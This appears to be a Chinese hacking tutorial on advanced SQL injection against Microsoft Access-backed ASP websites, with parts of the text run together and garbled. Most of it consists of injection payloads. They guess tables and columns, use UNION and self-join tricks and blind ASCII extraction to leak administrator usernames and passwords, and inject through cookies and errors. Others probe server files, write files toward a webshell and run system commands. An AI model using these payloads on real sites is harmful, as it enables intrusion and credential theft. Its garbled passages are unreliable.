Access数据库注入高级玩法

1、Access数据库注入高级玩法Access数据库注入高级玩法，鉴于论坛的朋友要求，在这整理下，以飨读者。Access数据库想对于MsSql来说可谓小巫见大巫，但是Acc的数据库在目前国内还是有一定的市场，其注入也很灵活。相信你看完本文就会了解到Access也是很强大的。一，基础篇猜解表名，这里借用啊DODO：andexists（select*from表名）猜解列名：andexists（select字段from表名）UNION法，在执行union之前建议进行下orderby这样会更快。联合查询：selectname,password,idfromuserunionselectuser,pwd,u

2、idfrom如果遇到orderby错误提示，执行下2次union可解决and1=2unionselect1,2,3,4,5from表名unionselect1,2,3,4,5from表名爆指定表名内容：and1=2unionselect1,2,3,4,5from表名ASCII逐字解码法：1、猜解列长度猜解语句：TOC o 1-5 h zand（selecttop1len（列名）from表名）Nand（selecttop1len（列名）from表名）=N其中N是数字，变换这个No值猜解列长度，例如：and（selecttop1len（列名）from表名）1and（selecttop1len（列名

3、）from表名）6如果一直猜到6都显示正常页面，猜到7的时候返回错误（大于6并且小于等于7），那么该列的长度为。因为“top1”的意思是把最靠前的1条记录给提取出来，所以如果要猜解第二条记录就该使用：selecttop1len（列名）from表名where列名notin（selecttop1列名from表名）2、ASCII码分析法猜解用户和密码ASC（）函数和Mid函数例如：mid（列名,N,1）ASC（mdi（列名，N,1）得到“列名”第N位字符ASCII码猜解语句为：and（selecttop1asc（mid（字段,1,1）from数据库名）=ASC码（通过转换工具换）区间判断语句：bet

4、weenand中文处理法:当ASCII转换后为“负数”使用abs（）函数取绝对值。例：and（selecttop1abs（asc（mid（字段,1,1）from数据库名）=ASC码（通过转换工具换）ASCII逐字解码法的应用：1、猜解表名：and(selectcount(*)fromadmin)02、猜解列名：and(selectcount(列名)from表名)03、猜解管理员用户个数：and(selectcount(*)from表名)=1返回正常，表中有一条记录。4、猜解管理员用户名的长度：and(selectlen(列名)from表名)=1、=2、=3、=4。5、猜解管理员用户名：and(

5、selectcount(*)from表名where(asc(mid(列名，1,1)between30and130)0最后提交：and(selectasc(mid(列名,1,1)from表名)=ascii的值6、猜解管理员的密码：按照上面的原理，只要把上面的语句中(asc(mid(列名，1,1)的列名换成PASSWORD就能得到管理员的密码了。搜索型注入漏洞利用猜解语句：关键字%and1=1and%=%关键字%and1=2and%=%将and1=1换成注入语句就可以了。cookie注入语句：javascript:alert(document.cookie=id=+escape(44and1=1)

6、;javascript：alert(document.cookie=id=+escape(44and1=2);猜解语句：猜解长度：javascript：alert(document.cookie=id=+escape(44and(selectlen(password)fromadmin)=16)猜解内容：javascript：alert(document.cookie=id=+escape(44and(selectasc(mid(username)fromadmin)=97)二，高级篇1，Acc00000条件，知道一表名，一字段，一般来说ID字段还是有0。假如你知道orderby0000020

7、,那么，要知道admin表里的字段数，可以这样，and1=2unionselect1,2,3,4,5,6,7,8,*fromadmin出错，继续，and1=2unionselect1,2,3,4,5,6,7,8,9,*fromadmin逐一增加，直到返回正常这里要说下盲注，假如and1=2unionselect1,2,3,4,5,6,7,8,9,10,11,*fromadmin返回正常，此时可能会爆出admin0000,000admin表的复杂程度和RP假如到15时返回正常，说明admin000数为20-15=5个，下面来自联，自联还有一个重要的条件就是admin0000*220但这条语句是合

8、法的这个地方很关键，他为什么会是合法的语句，这个地方是技术核心必须理解。前边是22后边是怎么可能相等？因为a.id和b.id在*里是有的，那么计算机自动去掉重复的保持集合里元素的唯一性，这样一来虽然查询效果一样，但是*里的字段排列顺序却被打乱了！先后两次打乱很有可能让usernamepassword偏移到可显示的位置。如果还没成功怎么办？asunionselect1,2,3,4,5,6,7,8,9,10,a.id,b.id,c.id,*from(adminasainnerjoinadminbona.id=b.id)innerjoinadminascona.id=c.id)unionselect

9、1,2,3,4,5,6,7,8,9,10,a.id,b.id,c.id,d.id,*from(adminasainnerjoinadminasbona.id=b.id)innerjoinadminascona.id=c.id)innerjoinadminasdona.id=d.id)2,havingDO,groupby语句在Access数据库里，也支持having和groupby语句,众所周知,这2个语句我们常用来枚举字段名的，在Mssql数据库中很好使。在acc中就有些别扭了。这里分情况讨论，2020a:如果站点的Sql查询语句为据,那么我们可以这么暴,selectid,name,addre

10、ssfrom表名,也就是说查询的是特定的字段数productshow.asp?id=25groupby1having1=1(数字型),如果字符型就groupby1having1=1返回的错误：MicrosoftJETDatabaseEngine(0 x80040E21)试图执行的查询中不包含作为合计函数一部分的特定表达式id爆出id字段，继续，productshow.asp?id=25groupby1,idhaving1=1返回错误：MicrosoftJETDatabaseEngine(0 x80040E21)试图执行的查询中不包含作为合计函数一部分的特定表达式email。依次类推produc

11、tshow.asp?id=25groupby1,id,emailhaving1=1b:如果站点的原来SQL查询语句为select*fromproductwhereid=&ID&,那么执行上述语句就会返回这样的错误：MicrosoftJETDatabaseEngine错误80040e21不能将已选定*的字段中组合。/productshow.aspO行18这时我们可以这样爆字段，productshow.asp?id=25havingsum(l)=l(数字型),000(havingsum(1)=1)返回的错误：MicrosoftJETDatabaseEngine错误80040e21试图执行的查询中不

12、包含作为合计函数一部分的特定表达式id。/productshow.asp,行18可以看出爆出了ID但这样很有局限性，只能爆出第一个id,其他的没办法了。那只能盲猜了。productshow.asp?id=25andid=1不报错,productshow.asp?id=25andname=1返回错误：MicrosoftJETDatabaseEngine错误80040e10至少一个参数没有被指定值。/productshow.aspO行18连接到MsSQL数据库productshow.asp?id=25and1=2unionSelecttop11,2,table_namefromODBC;Drive

13、r=SQLServer;UID=dbo;PWD=dba;Server=*;DataBase=rmation_schema.tables这样master库的第一个表名就出来了获得后面的表名也很简单unionSelecttop11,2,table_namefromODBC;Driver=SQLServer;UID=dbo;PWD=dba;Server=*;DataBase=rmation_schema.tableswheretable_namenotin(selecttop1table_namefromODBC;Driver=SQLServer;UID=

14、dbo;PWD=dba;Server=*;DataBase=rmation_schema.tables)如果数据库里的ID是字符型unionSelecttop11,2,table_namefromODBC;Driver=SQLServer;UID=dbo;PWD=dba;Server=*;DataBase=rmation_schema.tableswhere1=1返回的错误：MicrosoftJETDatabaseEngine错误80004005ODBC-连接到SQLServer*失败。如果这个错误返回延迟较长时间，说明database不允许连接，如

15、果错误返回很快，没时间延迟，说明提供的账号或者密码有误。映射本地驱动器使用in语句，比如productshow.asp?id=25and1=2unionselect*fromadminin返回的错误：MicrosoftJETDatabaseEngine错误80004005MicrosoftJet数据库引擎打不开文件c:windowssystem32inetsrv。它已经被别的用户以独占方式打开，或没有查看数据的权限。此查询可用于检测目录和文件，对于猜解网站目录很有用。再比如：productshow.asp?id=25and1=2unionselect*fromadmininC:windowsO

16、DBC.ini返回错误：MicrosoftJETDatabaseEngine错误80004005不可识别的数据库格式C:windowsODBC.INI。说明该文件存在，只是不是数据库。productshow.asp?id=25and1=2unionselect*fromadmininC:windows123.ini返回错误：MicrosoftJETDatabaseEngine错误80004005找不到文件C:windows123.ini。该文件不存在。5.写文件说到写文件，这里不得不提下lake2的那篇文章，SQL注入AccessDOWebShell如果我们执行这样的语句：SELECT*int

17、otest.txtind:webtext;fromadminSELECT*intotest.txtinyouripsharetext;fromadmin在d:web目录下就会生成test.txt文件，其内容就是表admin的内容，这条语句要执行是要有一定的条件的，单句执行没什么问题，但是放到注入点里执行时，等待你的是2种结果：1.动作查询不能作为行为的来源。2，如果在子语句，会提示子语句不支持此查询，也就是说不能在子查询和UNION查询中，实用价值不大实属鸡肋。但是这个还是必须得知道的。6.执行系统命令首先有必要介绍一下沙盒模式为了安全起见，MS在JetODOSp8中，设置了一个名为SandB

18、oxMode的开关，这个开关是开启一些特殊函数在另外的执行者中执行的权限的.它的注册表位置在HKEY_L0CAL_MACHINESoftWareMicrosoftJet4.0EngineSandBoxMode里，默认是2.微软关于这个键值的介绍为:0为在任何所有者中中都禁止起用安全设置，1为仅在允许的范围之内，2则是必须是Access的模式下,3则是完全开启，连Access中也不支持.Access也能执行系统命令，有个前提条件就是沙盒模式要是关闭的。如：productshow.asp?id=25and1=2unionselectcurdir()frommsysaccessobjectsand1=2unionselectdir(c:)frommsysaccessobjectsunionselectenviron(1)frommsysac